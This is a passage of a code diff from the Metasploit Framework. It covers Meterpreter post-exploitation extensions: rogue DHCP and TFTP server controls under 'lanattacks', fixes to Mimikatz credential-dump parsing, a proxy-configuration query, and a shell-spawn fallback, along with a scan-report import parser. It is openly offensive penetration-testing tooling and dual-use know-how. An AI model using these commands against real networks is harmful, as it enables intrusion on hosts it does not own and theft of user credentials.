return unless in_tag("host") || in_tag("detail")
record_text
when "platform"
return unless in_tag("hostlist")
return unless in_tag("host")
record_text
when "portinfo"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
record_service
when "portlist"
record_services
when "portnumber", "protocol", "service"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
return unless in_tag("portinfo")
record_text
when "report", "ip"
record_text
end
end
def end_element(name)
case name
when "description", "information"
return unless in_tag("detaillist")
return unless in_tag("detail")
collect_vuln_data(name)
when "detail"
return unless in_tag("detaillist")
collect_vuln
when "detaillist"
report_vulns
when "host"
return unless in_tag("hostlist")
collect_host
when "hostlist"
report_hosts
when "id"
return unless in_tag("detaillist")
return unless in_tag("detail")
return unless in_tag("cve")
collect_vuln_data(name)
when "ip"
collect_ip
when "name"
if in_tag("hostlist") && in_tag("host")
collect_host_data(name)
elsif in_tag("detaillist") && in_tag("detail")
collect_vuln_data(name)
end
when "platform"
return unless in_tag("hostlist")
return unless in_tag("host")
collect_host_data(name)
when "portinfo"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
collect_service
when "portlist"
report_services
when "portnumber", "protocol", "service"
return unless in_tag("portlist")
return unless in_tag("portlist-host")
return unless in_tag("portinfo")
collect_service_data(name)
when "report"
collect_product
end
@state[:current_tag].delete(name)
end
def record_hosts
@report_data[:hosts] = []
end
def record_services
@report_data[:services] = []
end
def record_vulns
@report_data[:vulns] = []
end
def record_host
@host = {}
end
def record_service
@service = {}
end
def record_vuln
@vuln = {}
@refs = []
end
def record_text
@state[:has_text] = true
end
def collect_host
@host[:host] = @state[:host]
@host[:name] = @state[:hname]
@host[:os_name] = @state[:os_name]
@host[:info] = @state[:pinfo]
@report_data[:hosts] << @host
end
def collect_service
@service[:host] = @state[:host]
@service[:port] = @state[:port]
@service[:proto] = @state[:proto]
@service[:name] = @state[:sname]
@service[:info] = @state[:pinfo]
@report_data[:services] << @service
end
def collect_vuln
@vuln[:host] = @state[:host]
@vuln[:name] = @state[:vname]
@vuln[:info] = @state[:vinfo]
@vuln[:refs] = @refs
@report_data[:vulns] << @vuln
end
def collect_product
@state[:has_text] = false
@state[:pinfo] = @text.strip if @text
@text = nil
end
def collect_ip
@state[:has_text] = false
@state[:host] = @text.strip if @text
@text = nil
end
def collect_host_data(name)
@state[:has_text] = false
if name == "name"
@state[:hname] = @text.strip if @text
elsif name == "platform"
if @text
@state[:os_name] = @text.strip
else
@state[:os_name] = Msf::OperatingSystems::UNKNOWN
end
end
@text = nil
end
def collect_service_data(name)
@state[:has_text] = false
if name == "portnumber"
@state[:port] = @text.strip if @text
elsif name == "protocol"
@state[:proto] = @text.strip.downcase if @text
elsif name == "service"
@state[:sname] = @text.strip if @text
end
@text = nil
end
def collect_vuln_data(name)
@state[:has_text] = false
if name == "name"
@state[:vname] = @text.strip if @text
elsif name == "description"
@state[:vinfo] = @text.strip if @text
elsif name == "information"
@state[:vinfo] << " #{@text.strip if @text}"
elsif name == "id"
@state[:ref] = @text.strip if @text
@refs << normalize_ref("CVE", @state[:ref])
end
@text = nil
end
def report_hosts
block = @block
@report_data[:hosts].each do |h|
db.emit(:address, h[:host], &block) if block
db_report(:host, h)
end
end
def report_services
block = @block
@report_data[:services].each do |s|
db.emit(:service, "#{s[:host]}:#{s[:port]}/#{s[:proto]}", &block) if block
db_report(:service, s)
end
end
def report_vulns
block = @block
@report_data[:vulns].each do |v|
db.emit(:vuln, ["#{v[:name]} (#{v[:host]})", 1], &block) if block
db_report(:vuln, v)
end
end
end
end
end

78
lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb Normal file
View File

@ -0,0 +1,78 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Lanattacks
module Dhcp
###
#
# DHCP Server functionality
#
###
class Dhcp
def initialize(client)
@client = client
end
def start
client.send_request(Packet.create_request('lanattacks_start_dhcp'))
true
end
def reset
client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
true
end
def set_option(name, value)
request = Packet.create_request('lanattacks_set_dhcp_option')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
client.send_request(request)
true
end
def load_options(datastore)
# TODO: change this so that all of the options are set in a single
# payload rather than firing off lots of calls separately
datastore.each do |name, value|
if Regexp.new('DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|'+
'SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST') =~ name
set_option(name, value)
end
end
end
def stop
client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
true
end
def log
response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
entries = []
if( response.result == 0 )
log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
while log.length > 0
mac = log.slice!(0..5)
ip = log.slice!(0..3)
entries << {
:mac => mac,
:ip => ip
}
end
end
entries
end
attr_accessor :client
end
end; end; end; end; end; end

87
lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
View File

@ -2,6 +2,8 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
require 'rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp'
require 'rex/post/meterpreter/extensions/lanattacks/tftp/tftp'
module Rex
module Post
@ -16,84 +18,27 @@ module Lanattacks
###
class Lanattacks < Extension
#
# Initializes an instance of the lanattacks extension.
#
def initialize(client)
super(client, 'lanattacks')
# Alias the following things on the client object so that they
# can be directly referenced
client.register_extension_aliases(
[{
[
{
'name' => 'lanattacks',
'ext' => self
},])
'ext' => ObjectAliases.new(
{
'dhcp' => Rex::Post::Meterpreter::Extensions::Lanattacks::Dhcp::Dhcp.new(client),
'tftp' => Rex::Post::Meterpreter::Extensions::Lanattacks::Tftp::Tftp.new(client)
}),
}
])
end
def start_dhcp
client.send_request(Packet.create_request('lanattacks_start_dhcp'))
true
end
def reset_dhcp
client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
true
end
def set_dhcp_option(name, value)
request = Packet.create_request('lanattacks_set_dhcp_option')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
client.send_request(request)
true
end
def load_dhcp_options(datastore)
datastore.each do |name, value|
if Regexp.new('DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|'+
'SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST') =~ name
set_dhcp_option(name,value)
end
end
end
def stop_dhcp
client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
true
end
def dhcp_log
response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
entries = []
if( response.result == 0 )
log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
while log.length > 0
mac = log.slice!(0..5)
ip = log.slice!(0..3)
entries << [ mac, ip ]
end
end
entries
end
def start_tftp
client.send_request(Packet.create_request('lanattacks_start_tftp'))
true
end
def reset_tftp
client.send_request(Packet.create_request('lanattacks_reset_tftp'))
true
end
def add_tftp_file(filename, data)
request = Packet.create_request('lanattacks_add_tftp_file')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
client.send_request(request)
true
end
def stop_tftp
client.send_request(Packet.create_request('lanattacks_stop_tftp'))
true
end
end
end; end; end; end; end

49
lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb Normal file
View File

@ -0,0 +1,49 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Lanattacks
module Tftp
###
#
# TFTP Server functionality
#
###
class Tftp
def initialize(client)
@client = client
end
def start
client.send_request(Packet.create_request('lanattacks_start_tftp'))
true
end
def reset
client.send_request(Packet.create_request('lanattacks_reset_tftp'))
true
end
def add_file(filename, data)
request = Packet.create_request('lanattacks_add_tftp_file')
request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
client.send_request(request)
true
end
def stop
client.send_request(Packet.create_request('lanattacks_stop_tftp'))
true
end
attr_accessor :client
end
end; end; end; end; end; end

8
lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
View File

@ -5,10 +5,10 @@ module Meterpreter
module Extensions
module Lanattacks
TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 1)
TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 2)
TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 3)
TLV_TYPE_LANATTACKS_RAW = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 4)
TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 3)
TLV_TYPE_LANATTACKS_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 4)
end
end

15
lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
View File

@ -34,14 +34,18 @@ class Mimikatz < Extension
])
end
def send_custom_command(function, args=[])
def send_custom_command_raw(function, args=[])
request = Packet.create_request('mimikatz_custom_command')
request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
args.each do |a|
request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a)
end
response = client.send_request(request)
return Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
return response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
end
def send_custom_command(function, args=[])
return Rex::Text.to_ascii(send_custom_command_raw(function, args))
end
def parse_creds_result(result)
@ -63,11 +67,18 @@ class Mimikatz < Extension
def parse_ssp_result(result)
details = CSV.parse(result)
accounts = []
return accounts unless details
details.each do |acc|
next unless acc.length == 5
ssps = acc[4].split(' }')
next unless ssps
ssps.each do |ssp|
next unless ssp
s_acc = ssp.split(' ; ')
next unless s_acc
user = s_acc[0].split('{ ')[1]
next unless user
account = {
:authid => acc[0],
:package => acc[1],

18
lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
View File

@ -231,6 +231,24 @@ class Config
return true
end
#
# Get's the current proxy configuration
#
def get_proxy_config()
request = Packet.create_request('stdapi_net_config_get_proxy')
response = client.send_request(request)
proxy_config = {
:autodetect => response.get_tlv_value(TLV_TYPE_PROXY_CFG_AUTODETECT),
:autoconfigurl => response.get_tlv_value(TLV_TYPE_PROXY_CFG_AUTOCONFIGURL),
:proxy => response.get_tlv_value(TLV_TYPE_PROXY_CFG_PROXY),
:proxybypass => response.get_tlv_value(TLV_TYPE_PROXY_CFG_PROXYBYPASS)
}
return proxy_config
end
protected
attr_accessor :client # :nodoc:

4
lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb
View File

@ -48,7 +48,7 @@ class Resolve
def resolve_hosts(hostnames, family=AF_INET)
request = Packet.create_request('stdapi_net_resolve_hosts')
request.add_tlv(TLV_TYPE_ADDR_TYPE, family)
hostnames.each do |hostname|
request.add_tlv(TLV_TYPE_HOST_NAME, hostname)
end
@ -84,7 +84,7 @@ class Resolve
end
if raw.empty?
ip = ""
ip = nil
else
if type == AF_INET
ip = Rex::Socket.addr_ntoa(raw[0..3])

17
lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
View File

@ -42,10 +42,13 @@ class MultiCaller
include DLLHelper
def initialize( client, parent )
def initialize( client, parent, win_consts )
@parent = parent
@client = client
# needed by DLL helper
@win_consts = win_consts
if( @client.platform =~ /x64/i )
@native = 'Q'
else
@ -224,9 +227,17 @@ class MultiCaller
rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT)
rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET)
rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR)
rec_err_msg = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_MSG)
# Error messages come back with trailing CRLF, so strip it out
# if we do get a message.
rec_err_msg.strip! if not rec_err_msg.nil?
# The hash the function returns
return_hash={"GetLastError" => rec_last_error}
return_hash = {
"GetLastError" => rec_last_error,
"ErrorMessage" => rec_err_msg
}
#process return value
case function.return_type
@ -303,8 +314,6 @@ class MultiCaller
protected
attr_accessor :win_consts
end # MultiCall
end; end; end; end; end; end

2
lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
View File

@ -290,7 +290,7 @@ class Railgun
#
def multi(functions)
if @multicaller.nil?
@multicaller = MultiCaller.new(client, self)
@multicaller = MultiCaller.new(client, self, ApiConstants.manager)
end
return @multicaller.call(functions)

6
lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
View File

@ -69,6 +69,12 @@ TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
# Resolve
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
# Proxy configuration
TLV_TYPE_PROXY_CFG_AUTODETECT = TLV_META_TYPE_BOOL | 1445
TLV_TYPE_PROXY_CFG_AUTOCONFIGURL = TLV_META_TYPE_STRING | 1446
TLV_TYPE_PROXY_CFG_PROXY = TLV_META_TYPE_STRING | 1447
TLV_TYPE_PROXY_CFG_PROXYBYPASS = TLV_META_TYPE_STRING | 1448
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501

60
lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks.rb Normal file
View File

@ -0,0 +1,60 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Lanattacks extension.
#
###
class Console::CommandDispatcher::Lanattacks
require 'rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp'
require 'rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp'
Klass = Console::CommandDispatcher::Lanattacks
Dispatchers =
[
Klass::Dhcp,
Klass::Tftp
]
include Console::CommandDispatcher
#
# Initializes an instance of the lanattacks command interaction.
#
def initialize(shell)
super
Dispatchers.each { |d|
shell.enstack_dispatcher(d)
}
end
#
# List of supported commands.
#
def commands
{
}
end
#
# Name for this dispatcher
#
def name
"Lanattacks extension"
end
end
end
end
end
end

254
lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb Normal file
View File

@ -0,0 +1,254 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The DHCP portion of the lanattacks extension.
#
###
class Console::CommandDispatcher::Lanattacks::Dhcp
Klass = Console::CommandDispatcher::Lanattacks::Dhcp
include Console::CommandDispatcher
#
# List of supported commands.
#
def commands
all = {
"dhcp_start" => "Start the DHCP server",
"dhcp_stop" => "Stop the DHCP server",
"dhcp_reset" => "Reset the DHCP server",
"dhcp_set_option" => "Set a DHCP server option",
"dhcp_load_options" => "Load DHCP optionis from a datastore",
"dhcp_log" => "Log DHCP server activity"
}
reqs = {
"dhcp_start" => [ "lanattacks_start_dhcp" ],
"dhcp_stop" => [ "lanattacks_stop_dhcp" ],
"dhcp_reset" => [ "lanattacks_reset_dhcp" ],
"dhcp_set_option" => [ "lanattacks_set_dhcp_option" ],
"dhcp_load_options" => [ "lanattacks_set_dhcp_option" ],
"dhcp_log" => [ "lanattacks_dhcp_log" ]
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#
# Name for this dispatcher.
#
def name
"Lanattacks: DHCP"
end
@@dhcp_start_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_start_usage
print("dhcp_start [-h]\n\n" +
"Starts a DHCP server in the current Meterpreter session.\n" +
@@dhcp_start_opts.usage + "\n")
end
def cmd_dhcp_start(*args)
@@dhcp_start_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_start_usage
return true
end
}
print_status( "Starting DHCP server ...")
client.lanattacks.dhcp.start
print_good( "DHCP server startd.")
end
@@dhcp_stop_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_stop_usage
print("dhcp_stop [-h]\n\n" +
"Stops the currently running DHCP server.\n" +
@@dhcp_stop_opts.usage + "\n")
end
def cmd_dhcp_stop(*args)
@@dhcp_stop_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_stop_usage
return true
end
}
print_status( "Stopping DHCP server ...")
client.lanattacks.dhcp.stop
print_good( "DHCP server stopped.")
end
@@dhcp_reset_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_reset_usage
print("dhcp_reset [-h]\n\n" +
"Resets the currently running DHCP server.\n" +
@@dhcp_reset_opts.usage + "\n")
end
def cmd_dhcp_reset(*args)
@@dhcp_reset_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_reset_usage
return true
end
}
print_status( "Resetting DHCP server ...")
client.lanattacks.dhcp.reset
print_good( "DHCP server reset.")
end
@@dhcp_set_option_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
@@dhcp_set_option_valid_options = [
"BROADCAST", "DHCPIPEND", "DHCPIPSTART", "DNSSERVER",
"FILENAME", "HOSTNAME", "HOSTSTART", "NETMASK",
"PXE", "PXECONF", "ROUTER", "SERVEONCE", "SRVHOST"
]
def print_dhcp_set_option_usage
print("dhcp_set_option <name> <value> [-h]\n\n" +
"Set a DHCP server option.\n\n" +
"Valid names are:\n" +
@@dhcp_set_option_valid_options.map {|o| " - #{o}\n" }.join('') +
@@dhcp_set_option_opts.usage + "\n")
end
def cmd_dhcp_set_option(*args)
@@dhcp_set_option_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_set_option_usage
return true
end
}
if args.length < 2
print_dhcp_set_option_usage
return true
end
name = args.shift.upcase
value = args.shift
if not @@dhcp_set_option_valid_options.include? name
print_error( "Invalid option name '#{name}'." )
return true
end
client.lanattacks.dhcp.set_option(name, value)
end
@@dhcp_load_options_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_load_options_usage
print("dhcp_load_options <datastore> [-h]\n\n" +
"Load settings from a datstore to the active DHCP server.\n\n" +
"The datastore must be a hash of name/value pairs.\n" +
"Valid names are:\n" +
@@dhcp_set_option_valid_options.map {|o| " - #{o}\n" }.join('') +
@@dhcp_set_option_opts.usage + "\n")
end
def cmd_dhcp_load_options(*args)
@@dhcp_set_option_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_set_option_usage
return true
end
}
if args.length < 1
print_dhcp_load_options_usage
return true
end
datastore = args.shift
if not datastore.is_a?(Hash)
print_dhcp_load_options_usage
return true
end
client.lanattacks.dhcp.load_options(datastore)
end
@@dhcp_log_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_dhcp_log_usage
print("dhcp_log [-h]\n\n" +
"Logs the DHCP operations captured by the DHCP server.\n" +
@@dhcp_log_opts.usage + "\n")
end
def cmd_dhcp_log(*args)
@@dhcp_log_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_dhcp_log_usage
return true
end
}
log = client.lanattacks.dhcp.log
table = Rex::Ui::Text::Table.new(
'Header' => 'DHCP Server Log',
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [ 'MAC Address', 'IP Address' ]
)
log.each { |l|
table << [ l[:mac], l[:ip] ]
}
print_line
print_line( table.to_s )
print_line( "Total log entries: #{log.length}" )
print_line
end
end
end
end
end
end

159
lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb Normal file
View File

@ -0,0 +1,159 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The TFTP portion of the lanattacks extension.
#
###
class Console::CommandDispatcher::Lanattacks::Tftp
Klass = Console::CommandDispatcher::Lanattacks::Tftp
include Console::CommandDispatcher
#
# List of supported commands.
#
def commands
all = {
"tftp_start" => "Start the TFTP server",
"tftp_stop" => "Stop the TFTP server",
"tftp_reset" => "Reset the TFTP server",
"tftp_add_file" => "Add a file to the TFTP server"
}
reqs = {
"tftp_start" => [ "lanattacks_start_tftp" ],
"tftp_stop" => [ "lanattacks_stop_tftp" ],
"tftp_reset" => [ "lanattacks_reset_tftp" ],
"tftp_add_file" => [ "lanattacks_add_tftp_file" ],
}
all.delete_if do |cmd, desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
all
end
#
# Name for this dispatcher.
#
def name
"Lanattacks: TFTP"
end
@@tftp_start_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_tftp_start_usage
print("tftp_start [-h]\n\n" +
"Starts a TFTP server in the current Meterpreter session.\n" +
@@tftp_start_opts.usage + "\n")
end
def cmd_tftp_start(*args)
@@tftp_start_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_tftp_start_usage
return true
end
}
print_status( "Starting TFTP server ..." )
client.lanattacks.tftp.start
print_good( "TFTP server startd." )
end
@@tftp_stop_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_tftp_stop_usage
print("tftp_stop [-h]\n\n" +
"Stops the currently running TFTP server.\n" +
@@tftp_stop_opts.usage + "\n")
end
def cmd_tftp_stop(*args)
@@tftp_stop_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_tftp_stop_usage
return true
end
}
print_status( "Stopping TFTP server ..." )
client.lanattacks.tftp.stop
print_good( "TFTP server stopped." )
end
@@tftp_reset_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_tftp_reset_usage
print("tftp_reset [-h]\n\n" +
"Resets the currently running TFTP server.\n" +
@@tftp_reset_opts.usage + "\n")
end
def cmd_tftp_reset(*args)
@@tftp_reset_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_tftp_reset_usage
return true
end
}
print_status( "Resetting TFTP server ..." )
client.lanattacks.tftp.reset
print_good( "TFTP server reset." )
end
@@tftp_add_file_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help banner." ])
def print_tftp_add_file_usage
print("tftp_add_file <file> [-h]\n\n" +
"Add a file to the currently running TFTP server.\n" +
@@tftp_add_file_opts.usage + "\n")
end
def cmd_tftp_add_file(*args)
@@tftp_add_file_opts.parse(args) { |opt, idx, val|
case opt
when '-h'
print_tftp_add_file_usage
return true
end
}
name = args.shift
print_status( "Adding file #{name} ..." )
client.lanattacks.tftp.add_file(name, ::File.read(name))
print_good( "File added." )
end
end
end
end
end
end

2
lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb
View File

@ -106,7 +106,7 @@ class Console::CommandDispatcher::Mimikatz
)
accounts.each do |acc|
table << [acc[:authid], acc[:package], acc[:domain], acc[:user], acc[:password]]
table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")]
end
print_line table.to_s

10
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
View File

@ -62,6 +62,7 @@ class Console::CommandDispatcher::Stdapi::Net
"portfwd" => "Forward a local port to a remote service",
"arp" => "Display the host ARP cache",
"netstat" => "Display the network connections",
"getproxy" => "Display the current proxy configuration",
}
reqs = {
"ipconfig" => [ "stdapi_net_config_get_interfaces" ],
@ -78,6 +79,7 @@ class Console::CommandDispatcher::Stdapi::Net
"portfwd" => [ ],
"arp" => [ "stdapi_net_config_get_arp_table" ],
"netstat" => [ "stdapi_net_config_get_netstat" ],
"getproxy" => [ "stdapi_net_config_get_proxy" ],
}
all.delete_if do |cmd, desc|
@ -414,6 +416,14 @@ class Console::CommandDispatcher::Stdapi::Net
print @@portfwd_opts.usage
end
def cmd_getproxy
p = client.net.config.get_proxy_config()
print_line( "Auto-detect : #{p[:autodetect] ? "Yes" : "No"}" )
print_line( "Auto config URL : #{p[:autoconfigurl]}" )
print_line( "Proxy URL : #{p[:proxy]}" )
print_line( "Proxy Bypass : #{p[:proxybypass]}" )
end
protected
#

10
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
View File

@ -236,7 +236,15 @@ class Console::CommandDispatcher::Stdapi::Sys
when /win/
path = client.fs.file.expand_path("%COMSPEC%")
path = (path and not path.empty?) ? path : "cmd.exe"
cmd_execute("-f", path, "-c", "-H", "-i", "-t")
# attempt the shell with thread impersonation
begin
cmd_execute("-f", path, "-c", "-H", "-i", "-t")
rescue
# if this fails, then we attempt without impersonation
print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
cmd_execute("-f", path, "-c", "-H", "-i")
end
when /linux/
# Don't expand_path() this because it's literal anyway
path = "/bin/sh"

Some files were not shown because too many files have changed in this diff Show More